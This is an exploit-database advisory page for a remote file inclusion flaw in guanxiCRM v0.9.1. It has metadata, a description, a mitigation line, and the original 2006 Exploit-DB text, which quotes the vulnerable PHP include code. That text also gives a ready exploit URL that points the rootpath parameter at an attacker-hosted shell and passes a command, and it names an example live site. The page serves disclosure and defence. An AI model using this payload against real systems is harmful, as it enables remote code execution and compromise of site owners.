guanxiCRM - exploit.company

vendor:

guanxiCRM

by:

SHiKaA

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: guanxiCRM

Affected Version From: v0.9.1

Affected Version To: v0.9.1

Patch Exists: YES

Related CWE: N/A

CPE: a:guanxicrm:guanxicrm:0.9.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

guanxiCRM <= v0.9.1 (rootpath) Remote File Inclusion Exploit

A vulnerability exists in guanxiCRM version v0.9.1, which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'rootpath' parameter in the 'include/phpxd/phpXD.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote hosts, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of guanxiCRM or apply the appropriate patch.

Source

Exploit-DB raw data:

#==============================================================================================
#guanxiCRM <= v0.9.1 (rootpath) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://sourceforge.net/projects/guanxicrm/      
#                                                                      
#Version : v0.9.1                                            
#                                                        
#================================================================================================
#
#Example : http://www.nu3d.com/crm
#
#================================================================================================
#Bug in : include/phpxd/phpXD.php
#
#Vlu Code :
#--------------------------------
#     $path = $appconf["rootpath"]. "/include/phpxd/";
#
#     require($path."include/dom.php");
#     require($path."include/dtd.php");
#     require($path."include/parser.php");
#     ?>
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/include/phpxd/phpXD.php?appconf[rootpath]=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & XoRoN & Saudi Hackerz
==================================================================================================

# milw0rm.com [2006-09-16]